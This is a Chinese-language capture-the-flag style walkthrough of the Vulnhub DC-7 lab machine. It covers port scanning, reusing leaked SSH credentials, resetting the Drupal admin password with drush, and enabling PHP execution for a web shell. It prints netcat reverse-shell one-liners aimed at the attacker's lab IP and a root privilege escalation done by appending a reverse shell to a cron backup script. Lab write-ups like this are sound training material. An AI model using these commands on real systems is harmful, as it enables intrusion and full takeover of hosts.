> 本文由 [简悦 SimpRead](http://ksria.com/simpread/) 转码, 原文地址 [mp.weixin.qq.com](https://mp.weixin.qq.com/s/hcH1Uu24paa8DT5T8ARtyw)
说明:Vulnhub 是一个渗透测试实战网站,提供了许多带有漏洞的渗透测试靶机下载。适合初学者学习,实践。DC-7 全程只有一个 falg,获取 root 权限,以下内容是自身复现的过程,总结记录下来,如有不足请多多指教。
下载地址:
Download: http://www.five86.com/downloads/DC-7.zip
目标机 IP 地址:192.168.5.142
攻击机 kali IP 地址:192.168.5.135
arp-scan -l 发现目标主机。
扫描端口
nmap -sS -sV -p- 192.168.5.142
访问 80 端口是 Drupal CMS。页面中提示我们强行的爆破不会成功,让我们尝试一下对外方式。社工操作。
某度下搜了一下 @DC7USER, 发现开源项目。
查看 config 配置文件,存在一位用户名以及密码, ssh 登录。
dc7user/MdR3xOgB7#dW
ssh 连接成功。
home 目录下存在一个文件夹,还有一个 mbox 文件。
查看 mbox 发现一封邮件,记录了一些对数据库的转存内容。
好像是说数据库转存到了 / home/dc7user/backups/website.sql
发现两个 gpg 后缀的文件,.gpg 后缀的文件是某种加密文件。
/opt/scripts/backups.sh 文件只有 www 和 root 用户才可执行。我通过 backups.sh 发现该站配置了 drush。
Drupal 使用 Drush 是专门服务于 drupal 的第三方模块。
使用 drush 来更改 admin 用户的密码。
可通过 drush 修改 admin 的密码。
drush user-password admin --password="gem"
后台登陆成功。
点击 extend 扩展 php 模块。
下载 php 模块:
https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz
添加进去。
开启 php 模块,点击后 install 后即可。
添加模板,尝试执行 php 代码。
写入一句话,蚁剑连接,反弹 shell。
nc 192.168.5.135 7777 -e /bin/bash
转换交互式 shell。
python -c 'import pty;pty.spawn("/bin/bash")'
提权: 写入 backups.sh 获取 root 权限。
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.5.135 8888 >/tmp/f" >> backups.sh